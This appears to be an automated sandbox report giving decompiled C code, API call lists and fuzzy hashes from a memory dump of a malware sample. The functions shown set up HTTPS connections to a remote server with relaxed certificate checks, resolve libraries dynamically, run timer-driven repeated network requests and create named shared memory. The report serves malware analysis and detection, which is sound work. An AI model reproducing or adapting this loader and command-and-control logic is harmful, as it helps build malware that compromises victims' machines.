                            					_t152 = E00CF1A30(1, _t147, _a16,  *_t89);
                            					_v28 = _t152;
                            					asm("lock xadd [eax], ecx");
                            					if(_t152 == 0) {
                            						L24:
                            						RtlFreeHeap( *0xcfd238, _t156, _v8); // executed
                            						goto L25;
                            					}
                            					StrTrimA(_t152, 0xcfc2a4);
                            					_t95 =  *0xcfd2a4; // 0x247a5a8
                            					_push(_t152);
                            					_t18 = _t95 + 0xcfe252; // 0x616d692f
                            					_t97 = E00CF2773(_t18);
                            					_v16 = _t97;
                            					if(_t97 == 0) {
                            						L23:
                            						RtlFreeHeap( *0xcfd238, _t156, _t152); // executed
                            						goto L24;
                            					}
                            					_t157 = __imp__;
                            					 *_t157(_t152, _a4);
                            					 *_t157(_v8, _v20);
                            					_t158 = __imp__;
                            					 *_t158(_v8, _v16);
                            					 *_t158(_v8, _t152);
                            					_t104 = E00CF978C(0, _v8);
                            					_a4 = _t104;
                            					if(_t104 == 0) {
                            						_v12 = 8;
                            						L21:
                            						E00CF5BEA();
                            						L22:
                            						HeapFree( *0xcfd238, 0, _v16);
                            						_t156 = 0;
                            						goto L23;
                            					}
                            					_t108 = E00CFA523(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                            					_v12 = _t108;
                            					if(_t108 == 0) {
                            						_t161 = _v24;
                            						_t115 = E00CF9561(_t161, _a4, _a8, _a12); // executed
                            						_v12 = _t115;
                            						_t116 =  *((intOrPtr*)(_t161 + 8));
                            						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                            						_t118 =  *((intOrPtr*)(_t161 + 8));
                            						 *((intOrPtr*)( *_t118 + 8))(_t118);
                            						_t120 =  *((intOrPtr*)(_t161 + 4));
                            						 *((intOrPtr*)( *_t120 + 8))(_t120);
                            						_t122 =  *_t161;
                            						 *((intOrPtr*)( *_t122 + 8))(_t122);
                            						E00CF677C(_t161);
                            					}
                            					if(_v12 != 0x10d2) {
                            						L16:
                            						if(_v12 == 0) {
                            							_t110 = _a8;
                            							if(_t110 != 0) {
                            								_t153 =  *_t110;
                            								_t159 =  *_a12;
                            								wcstombs( *_t110,  *_t110,  *_a12);
                            								_t113 = E00CF6221(_t153, _t153, _t159 >> 1);
                            								_t152 = _v28;
                            								 *_a12 = _t113;
                            							}
                            						}
                            						goto L19;
                            					} else {
                            						if(_a8 != 0) {
                            							L19:
                            							E00CF677C(_a4);
                            							if(_v12 == 0 || _v12 == 0x10d2) {
                            								goto L22;
                            							} else {
                            								goto L21;
                            							}
                            						}
                            						_v12 = _v12 & 0x00000000;
                            						goto L16;
                            					}
                            				}
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00CF12D8
                            • wsprintfA.USER32 ref: 00CF1328
                            • wsprintfA.USER32 ref: 00CF1345
                            • wsprintfA.USER32 ref: 00CF1371
                            • HeapFree.KERNEL32(00000000,?), ref: 00CF1383
                            • wsprintfA.USER32 ref: 00CF13A4
                            • HeapFree.KERNEL32(00000000,?), ref: 00CF13B4
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF13E2
                            • GetTickCount.KERNEL32 ref: 00CF13F3
                            • RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF1407
                            • RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF1425
                              • Part of subcall function 00CF1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
                              • Part of subcall function 00CF1A30: lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63
                              • Part of subcall function 00CF1A30: strcpy.NTDLL ref: 00CF1A7A
                              • Part of subcall function 00CF1A30: lstrcat.KERNEL32(00000000,?), ref: 00CF1A85
                              • Part of subcall function 00CF1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2
                            • StrTrimA.SHLWAPI(00000000,00CFC2A4,?,031795B0), ref: 00CF145C
                              • Part of subcall function 00CF2773: lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
                              • Part of subcall function 00CF2773: lstrlen.KERNEL32(?), ref: 00CF2787
                              • Part of subcall function 00CF2773: lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
                              • Part of subcall function 00CF2773: lstrcat.KERNEL32(00000000,?), ref: 00CF27A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00CF1489
                            • lstrcpy.KERNEL32(?,?), ref: 00CF1491
                            • lstrcat.KERNEL32(?,?), ref: 00CF149F
                            • lstrcat.KERNEL32(?,00000000), ref: 00CF14A5
                              • Part of subcall function 00CF978C: lstrlen.KERNEL32(?,00000000,00CFD330,00000001,00CF3435,00CFD00C,00CFD00C,00000000,00000005,00000000,00000000,?,?,?,00CF568F,00CF5073), ref: 00CF9795
                              • Part of subcall function 00CF978C: mbstowcs.NTDLL ref: 00CF97BC
                              • Part of subcall function 00CF978C: memset.NTDLL ref: 00CF97CE
                            • wcstombs.NTDLL ref: 00CF1538
                              • Part of subcall function 00CF9561: SysAllocString.OLEAUT32(?), ref: 00CF959C
                              • Part of subcall function 00CF9561: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00CF961F
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            • HeapFree.KERNEL32(00000000,?,?), ref: 00CF1579
                            • RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 00CF1585
                            • RtlFreeHeap.NTDLL(00000000,?,?,031795B0), ref: 00CF1591
                            • HeapFree.KERNEL32(00000000,?), ref: 00CF159D
                            • RtlFreeHeap.NTDLL(00000000,?), ref: 00CF15A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 603507560-0
                            • Opcode ID: 2fb12e299d0b39162cc911d05a17c6cf8939603ef07a5df9fecfcb64b926cc1e
                            • Instruction ID: acfdc035a2214616b4d61b126143c06edf67e2e24b4ccef72286f232b7e65dc3
                            • Opcode Fuzzy Hash: 2fb12e299d0b39162cc911d05a17c6cf8939603ef07a5df9fecfcb64b926cc1e
                            • Instruction Fuzzy Hash: F5911671A00208EFCB51EFA4DD89BBE7BB9EF48310B154054FA0AD7260DB31DA51DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00CFA934(void* __eax, void* __ecx, long __esi, char* _a4) {
                            				void _v8;
                            				long _v12;
                            				void _v16;
                            				void* _t34;
                            				void* _t38;
                            				void* _t40;
                            				char* _t56;
                            				long _t57;
                            				void* _t58;
                            				intOrPtr _t59;
                            				long _t65;
                            
                            				_t65 = __esi;
                            				_t58 = __ecx;
                            				_v16 = 0xea60;
                            				__imp__( *(__esi + 4));
                            				_v12 = __eax + __eax;
                            				_t56 = E00CF8D59(__eax + __eax + 1);
                            				if(_t56 != 0) {
                            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                            						E00CF677C(_t56);
                            					} else {
                            						E00CF677C( *(__esi + 4));
                            						 *(__esi + 4) = _t56;
                            					}
                            				}
                            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                            				 *(_t65 + 0x10) = _t34;
                            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E00CFA8C9) == 0xffffffff) {
                            					L15:
                            					return GetLastError();
                            				} else {
                            					ResetEvent( *(_t65 + 0x1c));
                            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
                            					 *(_t65 + 0x14) = _t38;
                            					if(_t38 != 0 || GetLastError() == 0x3e5 && E00CF9837( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                            						_t59 =  *0xcfd2a4; // 0x247a5a8
                            						_t15 = _t59 + 0xcfe743; // 0x544547
                            						_v8 = 0x84c03180;
                            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65);
                            						 *(_t65 + 0x18) = _t40;
                            						if(_t40 == 0) {
                            							goto L15;
                            						}
                            						_t57 = 4;
                            						_v12 = _t57;
                            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                            							_v8 = _v8 | 0x00000100;
                            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                            						}
                            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                            							goto L15;
                            						} else {
                            							return 0;
                            						}
                            					} else {
                            						goto L15;
                            					}
                            				}
                            			}















                            APIs
                            • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 00CFA946
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 00CFA969
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 00CFA991
                            • InternetSetStatusCallback.WININET(00000000,00CFA8C9), ref: 00CFA9A8
                            • ResetEvent.KERNEL32(?), ref: 00CFA9BA
                            • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 00CFA9D0
                            • GetLastError.KERNEL32 ref: 00CFA9DD
                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 00CFAA23
                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 00CFAA41
                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 00CFAA62
                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 00CFAA6E
                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 00CFAA7E
                            • GetLastError.KERNEL32 ref: 00CFAA88
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                            • String ID: b`p
                            • API String ID: 2290446683-4292703735
                            • Opcode ID: f248915b05886b0eb3893ae463dd7dfdb8cb6431cb4a3c528da4ffc70831f48d
                            • Instruction ID: 9f19a5cb1542f2cec023f9e7849237a1b5af2f24062de98dd610aef51e036ccc
                            • Opcode Fuzzy Hash: f248915b05886b0eb3893ae463dd7dfdb8cb6431cb4a3c528da4ffc70831f48d
                            • Instruction Fuzzy Hash: 23416DB1500208BFD7319FA1DD88F7FBBBDEB49740B104929F617910A0DB71AA49DB22
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E00CFAD65(long _a4, long _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				LONG* _v28;
                            				long _v40;
                            				long _v44;
                            				long _v48;
                            				CHAR* _v52;
                            				long _v56;
                            				CHAR* _v60;
                            				long _v64;
                            				signed int* _v68;
                            				char _v72;
                            				signed int _t76;
                            				signed int _t80;
                            				signed int _t81;
                            				intOrPtr* _t82;
                            				intOrPtr* _t83;
                            				intOrPtr* _t85;
                            				intOrPtr* _t90;
                            				intOrPtr* _t95;
                            				intOrPtr* _t98;
                            				struct HINSTANCE__* _t99;
                            				void* _t102;
                            				intOrPtr* _t104;
                            				void* _t115;
                            				long _t116;
                            				void _t125;
                            				void* _t131;
                            				signed short _t133;
                            				struct HINSTANCE__* _t138;
                            				signed int* _t139;
                            
                            				_t139 = _a4;
                            				_v28 = _t139[2] + 0xcf0000;
                            				_t115 = _t139[3] + 0xcf0000;
                            				_t131 = _t139[4] + 0xcf0000;
                            				_v8 = _t139[7];
                            				_v60 = _t139[1] + 0xcf0000;
                            				_v16 = _t139[5] + 0xcf0000;
                            				_v64 = _a8;
                            				_v72 = 0x24;
                            				_v68 = _t139;
                            				_v56 = 0;
                            				asm("stosd");
                            				_v48 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				if(( *_t139 & 0x00000001) == 0) {
                            					_a8 =  &_v72;
                            					RaiseException(0xc06d0057, 0, 1,  &_a8);
                            					return 0;
                            				}
                            				_t138 =  *_v28;
                            				_t76 = _a8 - _t115 >> 2 << 2;
                            				_t133 =  *(_t131 + _t76);
                            				_a4 = _t76;
                            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                            				_v56 = _t80;
                            				_t81 = _t133 + 0xcf0002;
                            				if(_t80 == 0) {
                            					_t81 = _t133 & 0x0000ffff;
                            				}
                            				_v52 = _t81;
                            				_t82 =  *0xcfd1a0; // 0x0
                            				_t116 = 0;
                            				if(_t82 == 0) {
                            					L6:
                            					if(_t138 != 0) {
                            						L18:
                            						_t83 =  *0xcfd1a0; // 0x0
                            						_v48 = _t138;
                            						if(_t83 != 0) {
                            							_t116 =  *_t83(2,  &_v72);
                            						}
                            						if(_t116 != 0) {
                            							L32:
                            							 *_a8 = _t116;
                            							L33:
                            							_t85 =  *0xcfd1a0; // 0x0
                            							if(_t85 != 0) {
                            								_v40 = _v40 & 0x00000000;
                            								_v48 = _t138;
                            								_v44 = _t116;
                            								 *_t85(5,  &_v72);
                            							}
                            							return _t116;
                            						} else {
                            							if(_t139[5] == _t116 || _t139[7] == _t116) {
                            								L27:
                            								_t116 = GetProcAddress(_t138, _v52);
                            								if(_t116 == 0) {
                            									_v40 = GetLastError();
                            									_t90 =  *0xcfd19c; // 0x0
                            									if(_t90 != 0) {
                            										_t116 =  *_t90(4,  &_v72);
                            									}
                            									if(_t116 == 0) {
                            										_a4 =  &_v72;
                            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                            										_t116 = _v44;
                            									}
                            								}
                            								goto L32;
                            							} else {
                            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                            									_t116 =  *(_a4 + _v16);
                            									if(_t116 != 0) {
                            										goto L32;
                            									}
                            								}
                            								goto L27;
                            							}
                            						}
                            					}
                            					_t98 =  *0xcfd1a0; // 0x0
                            					if(_t98 == 0) {
                            						L9:
                            						_t99 = LoadLibraryA(_v60); // executed
                            						_t138 = _t99;
                            						if(_t138 != 0) {
                            							L13:
                            							if(InterlockedExchange(_v28, _t138) == _t138) {
                            								FreeLibrary(_t138);
                            							} else {
                            								if(_t139[6] != 0) {
                            									_t102 = LocalAlloc(0x40, 8);
                            									if(_t102 != 0) {
                            										 *(_t102 + 4) = _t139;
                            										_t125 =  *0xcfd198; // 0x0
                            										 *_t102 = _t125;
                            										 *0xcfd198 = _t102;
                            									}
                            								}
                            							}
                            							goto L18;
                            						}
                            						_v40 = GetLastError();
                            						_t104 =  *0xcfd19c; // 0x0
                            						if(_t104 == 0) {
                            							L12:
                            							_a8 =  &_v72;
                            							RaiseException(0xc06d007e, 0, 1,  &_a8);
                            							return _v44;
                            						}
                            						_t138 =  *_t104(3,  &_v72);
                            						if(_t138 != 0) {
                            							goto L13;
                            						}
                            						goto L12;
                            					}
                            					_t138 =  *_t98(1,  &_v72);
                            					if(_t138 != 0) {
                            						goto L13;
                            					}
                            					goto L9;
                            				}
                            				_t116 =  *_t82(0,  &_v72);
                            				if(_t116 != 0) {
                            					goto L33;
                            				}
                            				goto L6;
                            			}



































                            APIs
                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CFADDE
                            • LoadLibraryA.KERNELBASE(?), ref: 00CFAE5B
                            • GetLastError.KERNEL32 ref: 00CFAE67
                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00CFAE9A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: ExceptionRaise$ErrorLastLibraryLoad
                            • String ID: $
                            • API String ID: 948315288-3993045852
                            • Opcode ID: 4ba777b2d85fbd5ea35824c02ea9ae3a50b1dc3e3c912f7261e43a472d427604
                            • Instruction ID: ce3c77e3e6e37604c4b3db00517bc897570d4a265a2944c4aab16081f0e26725
                            • Opcode Fuzzy Hash: 4ba777b2d85fbd5ea35824c02ea9ae3a50b1dc3e3c912f7261e43a472d427604
                            • Instruction Fuzzy Hash: 10813DB5A00209AFDB54CF98D984BBDB7F5EF58310F108029E619D7350EB70EA45CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00CF27F7(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				struct %anon52 _v8;
                            				long _v12;
                            				char _v16;
                            				char _v20;
                            				signed int _v24;
                            				intOrPtr _v32;
                            				union _LARGE_INTEGER _v36;
                            				intOrPtr _v40;
                            				void* _v44;
                            				void _v88;
                            				char _v92;
                            				struct %anon52 _t46;
                            				intOrPtr _t51;
                            				long _t53;
                            				void* _t54;
                            				struct %anon52 _t60;
                            				long _t64;
                            				signed int _t65;
                            				void* _t68;
                            				void* _t70;
                            				signed int _t71;
                            				intOrPtr _t73;
                            				intOrPtr _t76;
                            				void** _t78;
                            				void* _t80;
                            
                            				_t73 = __edx;
                            				_v92 = 0;
                            				memset( &_v88, 0, 0x2c);
                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                            				_v44 = _t46;
                            				if(_t46 == 0) {
                            					_v8.LowPart = GetLastError();
                            				} else {
                            					_push(0xffffffff);
                            					_push(0xff676980);
                            					_push(0);
                            					_push( *0xcfd240);
                            					_v20 = 0;
                            					_v16 = 0;
                            					L00CFB048();
                            					_v36.LowPart = _t46;
                            					_v32 = _t73;
                            					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                            					_t51 =  *0xcfd26c; // 0x270
                            					_v40 = _t51;
                            					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                            					_v8.LowPart = _t53;
                            					if(_t53 == 0) {
                            						if(_a8 != 0) {
                            							L4:
                            							 *0xcfd24c = 5;
                            						} else {
                            							_t68 = E00CF5C8C(); // executed
                            							if(_t68 != 0) {
                            								goto L4;
                            							}
                            						}
                            						_v12 = 0;
                            						L6:
                            						L6:
                            						if(_v12 == 1 && ( *0xcfd260 & 0x00000001) == 0) {
                            							_v12 = 2;
                            						}
                            						_t71 = _v12;
                            						_t58 = _t71 << 4;
                            						_t76 = _t80 + (_t71 << 4) - 0x54;
                            						_t72 = _t71 + 1;
                            						_v24 = _t71 + 1;
                            						_t60 = E00CF9425(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                            						_v8.LowPart = _t60;
                            						if(_t60 != 0) {
                            							goto L17;
                            						}
                            						_t65 = _v24;
                            						_v12 = _t65;
                            						_t90 = _t65 - 3;
                            						if(_t65 != 3) {
                            							goto L6;
                            						} else {
                            							_v8.LowPart = E00CF4CBE(_t72, _t90,  &_v92, _a4, _a8);
                            						}
                            						goto L12;
                            						L17:
                            						__eflags = _t60 - 0x10d2;
                            						if(_t60 != 0x10d2) {
                            							_push(0xffffffff);
                            							_push(0xff676980);
                            							_push(0);
                            							_push( *0xcfd244);
                            							goto L21;
                            						} else {
                            							__eflags =  *0xcfd248; // 0x0
                            							if(__eflags == 0) {
                            								goto L12;
                            							} else {
                            								_t60 = E00CF5BEA();
                            								_push(0xffffffff);
                            								_push(0xdc3cba00);
                            								_push(0);
                            								_push( *0xcfd248);
                            								L21:
                            								L00CFB048();
                            								_v36.LowPart = _t60;
                            								_v32 = _t76;
                            								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                            								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                            								_v8.LowPart = _t64;
                            								__eflags = _t64;
                            								if(_t64 == 0) {
                            									goto L6;
                            								} else {
                            									goto L12;
                            								}
                            							}
                            						}
                            						L25:
                            					}
                            					L12:
                            					_t78 =  &_v92;
                            					_t70 = 3;
                            					do {
                            						_t54 =  *_t78;
                            						if(_t54 != 0) {
                            							HeapFree( *0xcfd238, 0, _t54);
                            						}
                            						_t78 =  &(_t78[4]);
                            						_t70 = _t70 - 1;
                            					} while (_t70 != 0);
                            					CloseHandle(_v44);
                            				}
                            				return _v8;
                            				goto L25;
                            			}





























                            APIs
                            • memset.NTDLL ref: 00CF280C
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00CF2818
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00CF283D
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00CF2859
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CF2872
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00CF2908
                            • CloseHandle.KERNEL32(?), ref: 00CF2917
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00CF2951
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00CF50A1,?), ref: 00CF2967
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CF2972
                              • Part of subcall function 00CF5C8C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03179378,00000000,?,74B5F710,00000000,74B5F730), ref: 00CF5CDB
                              • Part of subcall function 00CF5C8C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031793B0,?,00000000,30314549,00000014,004F0053,0317936C), ref: 00CF5D78
                              • Part of subcall function 00CF5C8C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00CF2885), ref: 00CF5D8A
                            • GetLastError.KERNEL32 ref: 00CF2984
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                            • String ID:
                            • API String ID: 3521023985-0
                            • Opcode ID: f41c64830633dd4fc1b42ec5a03a21483de84e5409aebe6d6f5baf35c7154d20
                            • Instruction ID: 8ab64411d85c9a4b20083f322682ce9162f784faecbad094600935e6f9c836ed
                            • Opcode Fuzzy Hash: f41c64830633dd4fc1b42ec5a03a21483de84e5409aebe6d6f5baf35c7154d20
                            • Instruction Fuzzy Hash: B0515BB190122CABCB10DF95DC84EFEBFB9EF49760F204615F621A2190C7708A44DBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E10001266(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                            				intOrPtr _v12;
                            				struct _FILETIME* _v16;
                            				short _v60;
                            				struct _FILETIME* _t14;
                            				intOrPtr _t15;
                            				long _t18;
                            				void* _t19;
                            				void* _t22;
                            				intOrPtr _t31;
                            				long _t32;
                            				void* _t34;
                            
                            				_t31 = __edx;
                            				_t14 =  &_v16;
                            				GetSystemTimeAsFileTime(_t14);
                            				_push(0x192);
                            				_push(0x54d38000);
                            				_push(_v12);
                            				_push(_v16);
                            				L10002070();
                            				_push(_t14);
                            				_v16 = _t14;
                            				_t15 =  *0x10004144;
                            				_push(_t15 + 0x1000505e);
                            				_push(_t15 + 0x10005054);
                            				_push(0x16);
                            				_push( &_v60);
                            				_v12 = _t31;
                            				L1000206A();
                            				_t18 = _a4;
                            				if(_t18 == 0) {
                            					_t18 = 0x1000;
                            				}
                            				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
                            				_t34 = _t19;
                            				if(_t34 == 0) {
                            					_t32 = GetLastError();
                            				} else {
                            					if(_a4 != 0 || GetLastError() == 0xb7) {
                            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                            						if(_t22 == 0) {
                            							_t32 = GetLastError();
                            							if(_t32 != 0) {
                            								goto L9;
                            							}
                            						} else {
                            							 *_a8 = _t34;
                            							 *_a12 = _t22;
                            							_t32 = 0;
                            						}
                            					} else {
                            						_t32 = 2;
                            						L9:
                            						CloseHandle(_t34);
                            					}
                            				}
                            				return _t32;
                            			}

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?,?), ref: 10001273
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001289
                            • _snwprintf.NTDLL ref: 100012AE
                            • CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 100012D3
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 100012EA
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 100012FE
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001316
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A), ref: 1000131F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001327
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1724014008-0
                            • Opcode ID: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
                            • Instruction ID: 23014b8b4f9051bbbcbfa4c64bc6cb21a5997a9fd7696493801a3747896fb516
                            • Opcode Fuzzy Hash: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
                            • Instruction Fuzzy Hash: C9217FB2A00118BFE711EFA8CC84EDE77ADEB483D1F118135FA15D7158DA719A458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00CF65B1(intOrPtr __edx, void** _a4, void** _a8) {
                            				intOrPtr _v8;
                            				struct _FILETIME* _v12;
                            				short _v56;
                            				struct _FILETIME* _t12;
                            				intOrPtr _t13;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr _t27;
                            				long _t28;
                            				void* _t30;
                            
                            				_t27 = __edx;
                            				_t12 =  &_v12;
                            				GetSystemTimeAsFileTime(_t12);
                            				_push(0x192);
                            				_push(0x54d38000);
                            				_push(_v8);
                            				_push(_v12);
                            				L00CFB042();
                            				_push(_t12);
                            				_v12 = _t12;
                            				_t13 =  *0xcfd2a4; // 0x247a5a8
                            				_t5 = _t13 + 0xcfe862; // 0x3178e0a
                            				_t6 = _t13 + 0xcfe59c; // 0x530025
                            				_push(0x16);
                            				_push( &_v56);
                            				_v8 = _t27;
                            				L00CFACDA();
                            				_t17 = CreateFileMappingW(0xffffffff, 0xcfd2a8, 4, 0, 0x1000,  &_v56); // executed
                            				_t30 = _t17;
                            				if(_t30 == 0) {
                            					_t28 = GetLastError();
                            				} else {
                            					if(GetLastError() == 0xb7) {
                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                            						if(_t21 == 0) {
                            							_t28 = GetLastError();
                            							if(_t28 != 0) {
                            								goto L6;
                            							}
                            						} else {
                            							 *_a4 = _t30;
                            							 *_a8 = _t21;
                            							_t28 = 0;
                            						}
                            					} else {
                            						_t28 = 2;
                            						L6:
                            						CloseHandle(_t30);
                            					}
                            				}
                            				return _t28;
                            			}

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53,?,?), ref: 00CF65BD
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00CF65D3
